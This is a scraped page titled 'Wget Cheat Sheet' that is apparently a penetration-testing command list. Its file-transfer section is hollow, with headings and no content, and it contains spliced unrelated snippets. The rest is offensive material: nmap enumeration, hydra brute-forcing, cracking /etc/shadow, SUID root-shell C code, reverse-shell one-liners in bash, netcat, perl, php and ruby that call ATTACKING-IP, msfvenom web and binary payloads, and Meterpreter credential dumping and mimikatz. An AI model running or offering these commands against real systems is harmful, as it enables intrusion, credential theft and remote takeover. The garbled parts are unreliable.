Wget Cheat Sheet

Posted on by



Often you may want to put a file onto a target, this can be useful to move exploits onto the target amongst other things. Most of these techniques can be used in reverse to exfiltrate data as well

Using wget

A common method uses wget to pull the files from a web server

Params

Examples

Servers Expose Files

Linux - Find command cheatsheet. By xngo on June 27, 2019. Read more about Linux - Find command cheatsheet; Comments. $ http POST name='John' Host:example.com — JSON, cookies, files, auth, and other httpie examples. One-page guide to httpie. A NixOS cheat sheet and comparison to Ubuntu. This is meant to give you basic ideas and get you unstuck. NixOS is very different from most distributions, a deeper understanding will be necessary sooner or later. Please follow the links to the manual pages or browse the Wiki for more in-depth NixOS tutorials. Jun 26, 2019 Introduced in PowerShell (PS) 3.0, the Microsoft version of Wget is supported as a core cmdlet in PS named Invoke-WebRequest. Tricks, and cheat sheets. Meterpreter Cheat Sheet. Upload file c: windows // Meterpreter upload file to Windows target. Place files in /var/www/html to be able to ‘wget’ them.

When you want to expose a file from your machine to wget you may want to enable a HTTP server on your machine to expose the files

Apache Server

Kali comes with an apache2 server pre-installed, it can be activated using the following command

then files within /var/www/html can be accessed on port 80 of your IP address

Python HTTP Server

Python can also provide a http server

This will expose the directory the command is run within and any sub directories as a web server

Params
Examples

Using Netcat

An alternative option is to use netcat to transfer the file as raw data

Reverse Connection

This uses a similar principle to a reverse shell, firstly you run open a listener on your machine, feeding in the file you wish to transfer, then on the target you connect back to the listener, sending the output to a file

Setting The Listener

Params
Examples

Triggering The Transfer

Params
Examples

Using SCP

If you have ssh credentials for the target, and an open ssh port you can use scp to transfer files

Using Username:Password Combo

When using this command you will prompted for the accounts password

Params

Examples

Using SSH Key

Params

Examples

General Enumeration:

  • nmap -vv -Pn -A -sC -sS -T 4 -p- 10.0.0.1
  • nmap -v -sS -A -T4 x.x.x.x // Verbose, SYN Stealth, Version info, and scripts against services.
  • nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X // Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover
  • netdiscover -r 192.168.1.0/24

FTP Enumeration (21):

  • nmap –script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.0.0.1

SSH (22):

  • nc INSERTIPADDRESS 22

SMTP Enumeration (25):

  • nmap –script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1
  • nc -nvv INSERTIPADDRESS 25
  • telnet INSERTIPADDRESS 25

Finger Enumeration (79):

Download script and run it with a wordlist: http://pentestmonkey.net/tools/user-enumeration/finger-user-enum

Web Enumeration (80/443):

  • dirbuster (GUI)
  • nikto –h 10.0.0.1

Pop3 (110):

  • telnet INSERTIPADDRESS 110

USER anounys@INSERTIPADDRESS

PASS admin

or:

USER anounys

PASS admin

RPCBind (111):

  • rpcinfo –p x.x.x.x

SMBRPC Enumeration (139/445):

  • enum4linux –a 10.0.0.1
  • nbtscan x.x.x.x // Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
  • py 192.168.XXX.XXX 500 50000 dict.txt
  • python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX
  • nmap IPADDR --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse
  • smbclient -L INSERTIPADDRESS
  • smbclient //INSERTIPADDRESS/tmp
  • smbclient INSERTIPADDRESS ipc$ -U john

SNMP Enumeration (161):

  • snmpwalk -c public -v1 10.0.0.0
  • snmpcheck -t 192.168.1.X -c public
  • onesixtyone -c names -i hosts
  • python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX
  • nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt
  • snmpenum -t 192.168.1.X

Oracle (1521):

  • tnscmd10g version -h INSERTIPADDRESS
  • tnscmd10g status -h INSERTIPADDRESS

Mysql Enumeration (3306):

  • nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122

DNS Zone Transfers:

  • nslookup -> set type=any -> ls -d xxx.com
  • dig axfr xxxx.com @ns1.xxx.com
  • dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml // Recon

Mounting File Share

  • showmount -e IPADDR
  • mount 192.168.1.1:/vol/share /mnt/nfs -nolock // mounts the share to /mnt/nfs without locking it
  • mount -t cifs -o username=user,password=pass,domain=xxx //192.168.1.X/share-name /mnt/cifs// Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
  • net use Z: win-servershare password /user:domainjanedoe /savecred /p:no // Mount a Windows share on Windows from the command line
  • apt-get install smb4k –y // Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Fingerprinting: Basic versioning / finger printing via displayed banner

  • nc -v 192.168.1.1 25
  • telnet 192.168.1.1 25

Exploit Research

  • searchsploit windows 2003 | grep -i local // Search exploit-db for exploit, in this example windows 2003 + local esc

Compiling Exploits

  • gcc -o exploit exploit.c // Compile C code, add –m32 after ‘gcc’ for compiling 32 bit code on 64 bit Linux
  • i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe // Compile windows .exe on Linux

Packet Inspection:

  • tcpdump tcp port 80 -w output.pcap -i eth0 // tcpdump for port 80 on interface eth0, outputs to output.pcap

Use hash-identifier to determine the hash type.

Paste the entire /etc/shadow file in a test file and run john with the text file after john.

john hashes.txt

  • hashcat -m 500 -a 0 -o output.txt –remove hashes.txt /usr/share/wordlists/rockyou.txt

Bruteforcing:

  • hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l admin
  • hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt IPADDR PROTOCOL
  • hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp –V // Hydra SMTP Brute force

Shells & Reverse Shells

SUID C Shells

  • bin/bash:

int main(void){

setresuid(0, 0, 0);

system(“/bin/bash”);

}

  • bin/sh:

int main(void){

setresuid(0, 0, 0);

system(“/bin/sh”);

}

  • gcc -o suid suid.c

TTY Shell:

  • python -c 'import pty;pty.spawn('/bin/bash')'
  • echo os.system('/bin/bash')
  • /bin/sh –i
  • execute('/bin/sh') // LUA
  • !sh // NMAP
  • :!bash // Vi

Spawn Ruby Shell

  • exec '/bin/sh' // TTY
  • ruby -rsocket -e'f=TCPSocket.open('ATTACKING-IP',80).to_i;exec sprintf('/bin/sh -i <&%d >&%d

Netcat

  • nc -e /bin/sh ATTACKING-IP 80
  • /bin/sh | nc ATTACKING-IP 80
  • rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Telnet Reverse Shell

  • rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
  • telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

PHP

  • php -r '$sock=fsockopen('ATTACKING-IP',80);exec('/bin/sh -i <&3 >&3 2>&3');'

(Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6)

Bash

  • exec /bin/bash 0&0 2>&0
  • 0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
  • exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done

# or: while read line 0<&5; do $line 2>&5 >&5; done

  • bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

Perl

  • exec '/bin/sh';
  • perl —e 'exec '/bin/sh';'
  • perl -e 'use Socket;$i='ATTACKING-IP';$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};'
  • perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,'ATTACKING-IP:80');STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' // Windows
  • perl -e 'use Socket;$i='ATTACKING-IP';$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};' // Windows

Windows reverse meterpreter payload

  • set payload windows/meterpreter/reverse_tcp // Windows reverse tcp payload

Windows VNC Meterpreter payload

  • set payload windows/vncinject/reverse_tcp // Meterpreter Windows VNC Payload
  • set ViewOnly false

Linux Reverse Meterpreter payload

  • set payload linux/meterpreter/reverse_tcp // Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

  • upload file c:windows // Meterpreter upload file to Windows target
  • download c:windowsrepairsam /tmp // Meterpreter download file from Windows target
  • download c:windowsrepairsam /tmp // Meterpreter download file from Windows target
  • execute -f c:windowstempexploit.exe // Meterpreter run .exe on target – handy for executing uploaded exploits
  • execute -f cmd -c // Creates new channel with cmd shell
  • ps // Meterpreter show processes
  • shell // Meterpreter get shell on the target
  • getsystem // Meterpreter attempts priviledge escalation the target
  • hashdump // Meterpreter attempts to dump the hashes on the target
  • portfwd add –l 3389 –p 3389 –r target // Meterpreter create port forward to target machine
  • portfwd delete –l 3389 –p 3389 –r target // Meterpreter delete port forward
  • use exploit/windows/local/bypassuac // Bypass UAC on Windows 7 + Set target + arch, x86/64
  • use auxiliary/scanner/http/dir_scanner // Metasploit HTTP directory scanner
  • use auxiliary/scanner/http/jboss_vulnscan // Metasploit JBOSS vulnerability scanner
  • use auxiliary/scanner/mssql/mssql_login // Metasploit MSSQL Credential Scanner
  • use auxiliary/scanner/mysql/mysql_version // Metasploit MSSQL Version Scanner
  • use auxiliary/scanner/oracle/oracle_login // Metasploit Oracle Login Module
  • use exploit/multi/script/web_delivery // Metasploit powershell payload delivery module
  • post/windows/manage/powershell/exec_powershell // Metasploit upload and run powershell script through a session
  • use exploit/multi/http/jboss_maindeployer // Metasploit JBOSS deploy
  • use exploit/windows/mssql/mssql_payload // Metasploit MSSQL payload
  • run post/windows/gather/win_privs // Metasploit show privileges of current user
  • use post/windows/gather/credentials/gpp // Metasploit grab GPP saved passwords
  • load mimikatz -> wdigest // Metasplit load Mimikatz
  • run post/windows/gather/local_admin_search_enum // Idenitfy other machines that the supplied domain user has administrative access to
  • set AUTORUNSCRIPT post/windows/manage/migrate

Meterpreter Payloads

  • msfvenom –l // List options

Binaries

  • msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
  • msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

Web Payloads

  • msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php // PHP
  • set payload php/meterpreter/reverse_tcp //Listener
  • cat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.php // PHP
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp // ASP
  • msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp // JSP
  • msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war // WAR

Scripting Payloads

  • msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py // Python
  • msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh // Bash
  • msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl // Perl

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

  • msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
  • msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f

Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

  • exploit/multi/handler
  • set PAYLOAD
  • set LHOST
  • set LPORT
  • set ExitOnSession false
  • exploit -j -z

An example is: msfvenom exploit/multi/handler -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f > exploit.extension

Execution Bypass

  • Set-ExecutionPolicy Unrestricted
  • iex(new-object system.net.webclient).downloadstring(“file:///C:examplefile.ps1”)

Powershell.exe blocked

  • Use ‘not powershell’ https://github.com/Ben0xA/nps

PS1 File blocked

  • iex(new-object system.net.webclient).downloadstring(“file:///C:examplefile.doc”)
    • Invoke-examplefile #This allows execution of any file extension

Linux:

Windows:

File Traverse:

Curl Cheat Sheet

Test HTTP options using curl:

Upload file using CURL to website with PUT option available

Wget